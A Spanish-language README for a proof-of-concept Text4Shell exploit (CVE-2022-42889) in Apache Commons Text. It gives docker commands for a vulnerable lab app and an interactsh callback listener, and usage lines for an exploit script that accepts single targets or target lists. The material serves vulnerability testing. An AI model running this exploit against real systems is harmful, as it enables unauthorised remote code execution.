
CVE-2022-42889 - exploit de Text4Shell
Esto es una Prueba de Concepto que explota la vulnerabilidad en Apache Commons Text [CVE-2022-42889]
Versiones vulnerables: 1.5.0 a (sin incluir) 1.10.0
La explotación exitosa de esta vulnerabilidad permite a un atacante no autenticado ejecutar código arbitrario en el activo vulnerable
Aplicación desarrollada por @securekomodo, se adjunta aquí.
Esta aplicación también se puede cargar desde el registro de docker
docker run -p 8080:8080 gokul2/text4shell-poc:latest
La aplicación estará disponible en localhost:8080 ahora.
Para verificar la ejecución arbitraria de comandos, usamos interactsh, una herramienta para capturar interacciones OOB de @projectdiscovery.
Configure el cliente interactsh antes de ejecutar el exploit real.
docker run projectdiscovery/interactsh-client:latest
Tome nota del dominio que aparece después de iniciar la aplicación
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Revise los registros en el cliente interactsh para validar el exploit.